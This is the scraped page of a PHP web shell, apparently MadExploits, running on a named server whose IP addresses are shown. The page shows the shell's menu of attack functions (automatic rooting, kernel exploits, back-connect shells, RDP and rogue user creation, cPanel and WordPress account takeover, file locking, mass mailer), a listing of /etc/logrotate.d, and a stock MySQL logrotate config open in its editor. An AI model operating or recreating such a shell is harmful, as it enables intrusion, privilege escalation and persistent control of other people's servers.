Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
bootlog
91
B
-rw-r--r--
chrony
160
B
-rw-r--r--
cups
71
B
-rw-r--r--
ea-php56-php-fpm
257
B
-rw-r--r--
ea-php70-php-fpm
257
B
-rw-r--r--
ea-php71-php-fpm
257
B
-rw-r--r--
ea-php72-php-fpm
257
B
-rw-r--r--
ea-php73-php-fpm
257
B
-rw-r--r--
ea-php74-php-fpm
257
B
-rw-r--r--
ea-php80-php-fpm
257
B
-rw-r--r--
ea-php81-php-fpm
257
B
-rw-r--r--
exim
405
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
glusterfs
1.08
KB
-rw-r--r--
iscsiuiolog
172
B
-rw-r--r--
libvirtd
165
B
-rw-r--r--
libvirtd.qemu
142
B
-rw-r--r--
modsecurity_logs
277
B
-rw-r--r--
mysql
972
B
-rw-r--r--
named
514
B
-rw-r-----
nscd_logs
180
B
-rw-r--r--
numad
106
B
-rw-r--r--
ppp
136
B
-rw-r--r--
psacct
408
B
-rw-r--r--
samba
115
B
-rw-r--r--
sssd
237
B
-rw-r--r--
sw-engine
114
B
-rw-r--r--
syslog
224
B
-rw-r--r--
wp-toolkit-action-logs
0
B
-rw-r--r--
wpa_supplicant
100
B
-rw-r--r--
yum
103
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql
# The log file name and location can be set in # /etc/my.cnf by setting the "log-error" option # in [mysqld] section as follows: # # [mysqld] # log-error=/var/log/mysqld.log # # For the mysqladmin commands below to work, root account # password is required. Use mysql_config_editor(1) to store # authentication credentials in the encrypted login path file # ~/.mylogin.cnf # # Example usage: # # mysql_config_editor set --login-path=client --user=root --host=localhost --password # # When these actions has been done, un-comment the following to # enable rotation of mysqld's log error. # #/var/log/mysqld.log { # create 640 mysql mysql # notifempty # daily # rotate 5 # missingok # compress # postrotate # # just if mysqld is really running # if test -x /usr/bin/mysqladmin && \ # /usr/bin/mysqladmin ping &>/dev/null # then # /usr/bin/mysqladmin flush-logs # fi # endscript #}
Close